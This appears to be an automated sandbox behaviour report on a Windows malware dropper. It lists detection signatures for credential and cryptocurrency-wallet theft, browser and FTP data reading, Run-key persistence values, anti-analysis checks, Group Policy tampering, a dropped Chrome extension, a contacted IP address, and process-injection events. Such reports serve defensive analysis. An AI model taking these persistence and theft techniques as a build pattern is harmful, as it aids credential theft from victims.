N/A N/A C:\Users\Admin\Documents\GuardFox\AKmdx4Gwhho65sDuSBTecSxH.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\JcMIo2ZYv_q90S6UZS5qMlPO.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-J8KKB.tmp\HBZbjdUX0pRpCqEGONC_Y2ES.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS11A5.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\T83K0fj1RPNZcK5ce9BGYbEr.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\Oo3P2P2VOFHTfbT2AUs5ehOf.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\FfTdssBgUOeUFS8ACw1xXwQq.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\GcY5mYzrooPu5n33Ou1uEsNN.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\Ipjb8_Ct3Bu5_uNThO5sOupY.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\ZXVOsXkq1YByDDKKVRvePpsA.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\WbpOVj2wdHtADLlWkCQJXyxg.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\ozHYoRTpmXEy7Cy7N9wHNH1A.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\griZbGlDTQ2Gp9lRWbcAmGPV.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\WBICreator\wbicreator.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2972_133531841536410118\WW9_64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS1A40.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\WBICreator\wbicreator.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3538781373-1545967067-4263767959-1000\Software\Wine C:\Users\Admin\Documents\GuardFox\rKlG0105_QMP5yCEVWPcwfwN.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Unexpected DNS network traffic destination

Description Indicator Process Target
Destination IP 193.233.132.49 N/A N/A
Destination IP 193.233.132.49 N/A N/A
Destination IP 193.233.132.49 N/A N/A
Destination IP 193.233.132.49 N/A N/A
Destination IP 193.233.132.49 N/A N/A
Destination IP 193.233.132.49 N/A N/A
Destination IP 193.233.132.49 N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3538781373-1545967067-4263767959-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\6822f988-ccf5-4e57-afb4-dd971c700c06\\xVovRr115da5UGt7mKVb47Cj.exe\" --AutoStart" C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3538781373-1545967067-4263767959-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ExtreamFanV5 = "C:\\Users\\Admin\\AppData\\Local\\ExtreamFanV5\\ExtreamFanV5.exe" C:\Users\Admin\Documents\GuardFox\FfTdssBgUOeUFS8ACw1xXwQq.exe N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\Documents\GuardFox\Oo3P2P2VOFHTfbT2AUs5ehOf.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\eciaojnpihmgkbacgpjnimcpkfeklgag\1.0.5_0\manifest.json C:\Users\Admin\Documents\GuardFox\GcY5mYzrooPu5n33Ou1uEsNN.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A api.myip.com N/A N/A
N/A api.myip.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A api.myip.com N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.myip.com N/A N/A
N/A ipinfo.io N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\7zS1A40.tmp\Install.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI C:\Users\Admin\Documents\GuardFox\GcY5mYzrooPu5n33Ou1uEsNN.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy C:\Users\Admin\Documents\GuardFox\GcY5mYzrooPu5n33Ou1uEsNN.exe N/A
File opened for modification C:\Windows\SysWOW64\GroupPolicy\gpt.ini C:\Users\Admin\Documents\GuardFox\GcY5mYzrooPu5n33Ou1uEsNN.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\Documents\GuardFox\GcY5mYzrooPu5n33Ou1uEsNN.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\rKlG0105_QMP5yCEVWPcwfwN.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\Oo3P2P2VOFHTfbT2AUs5ehOf.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\Documents\GuardFox\MHJl5U5jh6JBITZpQcz7bkql.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\Documents\GuardFox\MHJl5U5jh6JBITZpQcz7bkql.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\Documents\GuardFox\MHJl5U5jh6JBITZpQcz7bkql.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\Documents\GuardFox\7cKnjzD2VH8mdogK6Yqc74fk.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\Documents\GuardFox\7cKnjzD2VH8mdogK6Yqc74fk.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS1A40.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS1A40.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ N/A N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\MHJl5U5jh6JBITZpQcz7bkql.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\MHJl5U5jh6JBITZpQcz7bkql.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\rKlG0105_QMP5yCEVWPcwfwN.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\rKlG0105_QMP5yCEVWPcwfwN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-J8KKB.tmp\HBZbjdUX0pRpCqEGONC_Y2ES.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-J8KKB.tmp\HBZbjdUX0pRpCqEGONC_Y2ES.tmp N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\FfTdssBgUOeUFS8ACw1xXwQq.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\FfTdssBgUOeUFS8ACw1xXwQq.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\FfTdssBgUOeUFS8ACw1xXwQq.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\FfTdssBgUOeUFS8ACw1xXwQq.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\7cKnjzD2VH8mdogK6Yqc74fk.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\7cKnjzD2VH8mdogK6Yqc74fk.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\GcY5mYzrooPu5n33Ou1uEsNN.exe N/A
N/A N/A C:\Users\Admin\Documents\GuardFox\GcY5mYzrooPu5n33Ou1uEsNN.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\Documents\GuardFox\MHJl5U5jh6JBITZpQcz7bkql.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-J8KKB.tmp\HBZbjdUX0pRpCqEGONC_Y2ES.tmp N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1136 wrote to memory of 760 N/A N/A C:\Users\Admin\Documents\GuardFox\MHJl5U5jh6JBITZpQcz7bkql.exe
PID 1136 wrote to memory of 760 N/A N/A C:\Users\Admin\Documents\GuardFox\MHJl5U5jh6JBITZpQcz7bkql.exe
PID 1136 wrote to memory of 760 N/A N/A C:\Users\Admin\Documents\GuardFox\MHJl5U5jh6JBITZpQcz7bkql.exe
PID 1136 wrote to memory of 1856 N/A N/A C:\Users\Admin\Documents\GuardFox\HBZbjdUX0pRpCqEGONC_Y2ES.exe
PID 1136 wrote to memory of 1856 N/A N/A C:\Users\Admin\Documents\GuardFox\HBZbjdUX0pRpCqEGONC_Y2ES.exe
PID 1136 wrote to memory of 1856 N/A N/A C:\Users\Admin\Documents\GuardFox\HBZbjdUX0pRpCqEGONC_Y2ES.exe
PID 1136 wrote to memory of 2460 N/A N/A C:\Users\Admin\Documents\GuardFox\PRPSLOJESuJHQLjldDsEWa5D.exe
PID 1136 wrote to memory of 2460 N/A N/A C:\Users\Admin\Documents\GuardFox\PRPSLOJESuJHQLjldDsEWa5D.exe
PID 1136 wrote to memory of 2460 N/A N/A C:\Users\Admin\Documents\GuardFox\PRPSLOJESuJHQLjldDsEWa5D.exe
PID 1136 wrote to memory of 2568 N/A N/A C:\Users\Admin\Documents\GuardFox\rKlG0105_QMP5yCEVWPcwfwN.exe
PID 1136 wrote to memory of 2568 N/A N/A C:\Users\Admin\Documents\GuardFox\rKlG0105_QMP5yCEVWPcwfwN.exe
PID 1136 wrote to memory of 2568 N/A N/A C:\Users\Admin\Documents\GuardFox\rKlG0105_QMP5yCEVWPcwfwN.exe
PID 1136 wrote to memory of 4748 N/A N/A C:\Users\Admin\Documents\GuardFox\7cKnjzD2VH8mdogK6Yqc74fk.exe
PID 1136 wrote to memory of 4748 N/A N/A C:\Users\Admin\Documents\GuardFox\7cKnjzD2VH8mdogK6Yqc74fk.exe
PID 1136 wrote to memory of 4748 N/A N/A C:\Users\Admin\Documents\GuardFox\7cKnjzD2VH8mdogK6Yqc74fk.exe
PID 1136 wrote to memory of 3644 N/A N/A C:\Users\Admin\Documents\GuardFox\JcMIo2ZYv_q90S6UZS5qMlPO.exe
PID 1136 wrote to memory of 3644 N/A N/A C:\Users\Admin\Documents\GuardFox\JcMIo2ZYv_q90S6UZS5qMlPO.exe
PID 1136 wrote to memory of 3644 N/A N/A C:\Users\Admin\Documents\GuardFox\JcMIo2ZYv_q90S6UZS5qMlPO.exe
PID 1136 wrote to memory of 2868 N/A N/A C:\Users\Admin\Documents\GuardFox\aOiKcNVG4FAxtldCM7_Aj8fa.exe
PID 1136 wrote to memory of 2868 N/A N/A C:\Users\Admin\Documents\GuardFox\aOiKcNVG4FAxtldCM7_Aj8fa.exe
PID 1136 wrote to memory of 2868 N/A N/A C:\Users\Admin\Documents\GuardFox\aOiKcNVG4FAxtldCM7_Aj8fa.exe
PID 1136 wrote to memory of 5392 N/A N/A C:\Users\Admin\Documents\GuardFox\AKmdx4Gwhho65sDuSBTecSxH.exe
PID 1136 wrote to memory of 5392 N/A N/A C:\Users\Admin\Documents\GuardFox\AKmdx4Gwhho65sDuSBTecSxH.exe
PID 1136 wrote to memory of 5392 N/A N/A C:\Users\Admin\Documents\GuardFox\AKmdx4Gwhho65sDuSBTecSxH.exe
PID 1856 wrote to memory of 5684 N/A C:\Users\Admin\Documents\GuardFox\HBZbjdUX0pRpCqEGONC_Y2ES.exe C:\Users\Admin\AppData\Local\Temp\is-J8KKB.tmp\HBZbjdUX0pRpCqEGONC_Y2ES.tmp
PID 1856 wrote to memory of 5684 N/A C:\Users\Admin\Documents\GuardFox\HBZbjdUX0pRpCqEGONC_Y2ES.exe C:\Users\Admin\AppData\Local\Temp\is-J8KKB.tmp\HBZbjdUX0pRpCqEGONC_Y2ES.tmp
PID 1856 wrote to memory of 5684 N/A C:\Users\Admin\Documents\GuardFox\HBZbjdUX0pRpCqEGONC_Y2ES.exe C:\Users\Admin\AppData\Local\Temp\is-J8KKB.tmp\HBZbjdUX0pRpCqEGONC_Y2ES.tmp
PID 3644 wrote to memory of 5652 N/A C:\Users\Admin\Documents\GuardFox\JcMIo2ZYv_q90S6UZS5qMlPO.exe C:\Users\Admin\AppData\Local\Temp\7zS11A5.tmp\Install.exe
PID 3644 wrote to memory of 5652 N/A C:\Users\Admin\Documents\GuardFox\JcMIo2ZYv_q90S6UZS5qMlPO.exe C:\Users\Admin\AppData\Local\Temp\7zS11A5.tmp\Install.exe
PID 3644 wrote to memory of 5652 N/A C:\Users\Admin\Documents\GuardFox\JcMIo2ZYv_q90S6UZS5qMlPO.exe C:\Users\Admin\AppData\Local\Temp\7zS11A5.tmp\Install.exe
PID 1136 wrote to memory of 5820 N/A N/A C:\Users\Admin\Documents\GuardFox\T83K0fj1RPNZcK5ce9BGYbEr.exe
PID 1136 wrote to memory of 5820 N/A N/A C:\Users\Admin\Documents\GuardFox\T83K0fj1RPNZcK5ce9BGYbEr.exe
PID 1136 wrote to memory of 5820 N/A N/A C:\Users\Admin\Documents\GuardFox\T83K0fj1RPNZcK5ce9BGYbEr.exe
PID 1136 wrote to memory of 5972 N/A N/A C:\Users\Admin\Documents\GuardFox\Oo3P2P2VOFHTfbT2AUs5ehOf.exe
PID 1136 wrote to memory of 5972 N/A N/A C:\Users\Admin\Documents\GuardFox\Oo3P2P2VOFHTfbT2AUs5ehOf.exe
PID 1136 wrote to memory of 5972 N/A N/A C:\Users\Admin\Documents\GuardFox\Oo3P2P2VOFHTfbT2AUs5ehOf.exe
PID 1136 wrote to memory of 5980 N/A N/A C:\Users\Admin\Documents\GuardFox\FfTdssBgUOeUFS8ACw1xXwQq.exe
PID 1136 wrote to memory of 5980 N/A N/A C:\Users\Admin\Documents\GuardFox\FfTdssBgUOeUFS8ACw1xXwQq.exe
PID 1136 wrote to memory of 5980 N/A N/A C:\Users\Admin\Documents\GuardFox\FfTdssBgUOeUFS8ACw1xXwQq.exe
PID 1136 wrote to memory of 6044 N/A N/A C:\Users\Admin\Documents\GuardFox\Ipjb8_Ct3Bu5_uNThO5sOupY.exe
PID 1136 wrote to memory of 6044 N/A N/A C:\Users\Admin\Documents\GuardFox\Ipjb8_Ct3Bu5_uNThO5sOupY.exe
PID 1136 wrote to memory of 6044 N/A N/A C:\Users\Admin\Documents\GuardFox\Ipjb8_Ct3Bu5_uNThO5sOupY.exe
PID 1136 wrote to memory of 6076 N/A N/A C:\Users\Admin\Documents\GuardFox\ZXVOsXkq1YByDDKKVRvePpsA.exe
PID 1136 wrote to memory of 6076 N/A N/A C:\Users\Admin\Documents\GuardFox\ZXVOsXkq1YByDDKKVRvePpsA.exe
PID 1136 wrote to memory of 6076 N/A N/A C:\Users\Admin\Documents\GuardFox\ZXVOsXkq1YByDDKKVRvePpsA.exe
PID 1136 wrote to memory of 6088 N/A N/A C:\Users\Admin\Documents\GuardFox\GcY5mYzrooPu5n33Ou1uEsNN.exe
PID 1136 wrote to memory of 6088 N/A N/A C:\Users\Admin\Documents\GuardFox\GcY5mYzrooPu5n33Ou1uEsNN.exe
PID 1136 wrote to memory of 6088 N/A N/A C:\Users\Admin\Documents\GuardFox\GcY5mYzrooPu5n33Ou1uEsNN.exe
PID 1136 wrote to memory of 2816 N/A N/A C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe
PID 1136 wrote to memory of 2816 N/A N/A C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe
PID 1136 wrote to memory of 2816 N/A N/A C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe
PID 1136 wrote to memory of 2972 N/A N/A C:\Users\Admin\Documents\GuardFox\WbpOVj2wdHtADLlWkCQJXyxg.exe
PID 1136 wrote to memory of 2972 N/A N/A C:\Users\Admin\Documents\GuardFox\WbpOVj2wdHtADLlWkCQJXyxg.exe
PID 1136 wrote to memory of 5096 N/A N/A C:\Users\Admin\Documents\GuardFox\griZbGlDTQ2Gp9lRWbcAmGPV.exe
PID 1136 wrote to memory of 5096 N/A N/A C:\Users\Admin\Documents\GuardFox\griZbGlDTQ2Gp9lRWbcAmGPV.exe
PID 1136 wrote to memory of 5096 N/A N/A C:\Users\Admin\Documents\GuardFox\griZbGlDTQ2Gp9lRWbcAmGPV.exe
